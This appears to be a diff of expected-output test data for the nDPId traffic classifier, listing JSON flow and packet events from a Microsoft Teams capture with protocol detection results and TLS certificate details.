00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685984,"flow_last_seen":1587041685984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685984,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1587041685984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685984,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyNAbtKVk3bAAAAALAC\/\/8LQAAAAgQFtAEDAwUBAQgKMIS8GgAAAAAEAgAA"} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2019,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1587041685996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685996,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0TQBAAHUGACA0ccKEwKgBBgG77I3LqgPISlZN3IAS\/\/9gggAAAgQFoAEDAwgBAQQC"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2020,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1587041685996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685996,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyNAbtKVk3cy6oDyVAQIACBQQAA"} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2021,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685984,"flow_last_seen":1587041685997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041685997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2029,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685984,"flow_last_seen":1587041686010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6191,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1587041686010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2021,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685984,"flow_last_seen":1587041685997,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041685997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01288{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2029,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685984,"flow_last_seen":1587041686010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6191,"flow_avg_l4_payload_len":515,"midstream":0,"thread_ts_msec":1587041686010,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","server_names":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=teams.microsoft.com","fingerprint":"68:1E:E8:3C:83:70:6F:E3:86:F4:E8:8C:C4:E6:A0:9A:3E:E0:9C:0E"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686239,"flow_last_seen":1587041686239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686239,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2043,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1587041686239,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686239,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyPAbtgh2e9AAAAALAC\/\/9PlwAAAgQFtAEDAwUBAQgKMIS9EAAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2044,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1587041686288,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686288,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8YwZAAGwGaHQ0ck0hwKgBBgG77I9T9FE0YIdnvqASIADemAAAAgQFoAEDAwgEAggKYR9buzCEvRA="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2045,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1587041686288,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686288,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyPAbtgh2e+U\/RRNYAQEAkdGQAAAQEICjCEvUBhH1u7"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2074,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1587041686239,"flow_last_seen":1587041686542,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1587041686542,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2046,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686239,"flow_last_seen":1587041686288,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041686288,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2047,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1587041686239,"flow_last_seen":1587041686339,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1646,"flow_avg_l4_payload_len":329,"midstream":0,"thread_ts_msec":1587041686339,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041686611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":2076,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041686589,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1587041686659,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1587041686659,"pkt":"\/\/\/\/\/\/\/\/jP5XIzfkCABFAABE9p0AAEAR\/0vAqAFwwKgB\/+EV4RUAME6OU3BvdFVkcDBE2bWZ25IvowABAADKIN8ICP0NzlEBuCwq6R7jWIhweQ=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2077,"source":"teams.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686659,"flow_last_seen":1587041686659,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1587041686659,"l3_proto":"ip4","src_ip":"192.168.1.112","dst_ip":"192.168.1.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041686889,"flow_last_seen":1587041686889,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041686889,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2104,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1587041686889,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041686889,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGR0nAqAEGKH4JQ+yQAbuMpd1iAAAAALAC\/\/\/7KQAAAgQFtAEDAwUBAQgKMIS\/iwAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2108,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1587041686918,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041686918,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8PdhAAGwG3XQofglDwKgBBgG77JCDb8\/fjKXdY6ASIAC\/qwAAAgQFoAEDAwgEAggKUkSG7zCEv4s="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2109,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1587041686918,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041686918,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR1XAqAEGKH4JQ+yQAbuMpd1jg2\/P4IAQEAn+PwAAAQEICjCEv6dSRIbv"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2110,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686889,"flow_last_seen":1587041686919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041686919,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01490{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2135,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041686889,"flow_last_seen":1587041686950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4662,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1587041686950,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","server_names":"login.microsoftonline.com,login.microsoftonline-p.com,loginex.microsoftonline.com,login2.microsoftonline.com,stamp2.login.microsoftonline-int.com,login.microsoftonline-int.com,loginex.microsoftonline-int.com,login2.microsoftonline-int.com,stamp2.login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"678aeaf909676262acfb913ccb78a126","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=stamp2.login.microsoftonline.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"7E:0F:A2:51:8F:FB:49:30:C3:34:07:5E:F8:7C:FD:34:20:A2:96:63"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2110,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041686889,"flow_last_seen":1587041686919,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041686919,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01490{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2135,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1587041686889,"flow_last_seen":1587041686950,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4662,"flow_avg_l4_payload_len":518,"midstream":0,"thread_ts_msec":1587041686950,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","server_names":"login.microsoftonline.com,login.microsoftonline-p.com,loginex.microsoftonline.com,login2.microsoftonline.com,stamp2.login.microsoftonline-int.com,login.microsoftonline-int.com,loginex.microsoftonline-int.com,login2.microsoftonline-int.com,stamp2.login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"678aeaf909676262acfb913ccb78a126","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=stamp2.login.microsoftonline.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"7E:0F:A2:51:8F:FB:49:30:C3:34:07:5E:F8:7C:FD:34:20:A2:96:63"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041687245,"flow_last_seen":1587041687245,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041687245,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2189,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1587041687245,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041687245,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG93bAqAEGNHJNIeyRAbt4yq\/kAAAAALAC\/\/\/rWgAAAgQFtAEDAwUBAQgKMITA4AAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2193,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1587041687293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041687293,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8EaVAAGwGudU0ck0hwKgBBgG77JHMBk4keMqv5aASIADnTgAAAgQFoAEDAwgEAggKYPR58TCEwOA="} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2194,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1587041687293,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041687293,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyRAbt4yq\/lzAZOJYAQEAkl0AAAAQEICjCEwQ9g9Hnx"} -00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2195,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687245,"flow_last_seen":1587041687294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041687294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2195,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041687245,"flow_last_seen":1587041687294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041687294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 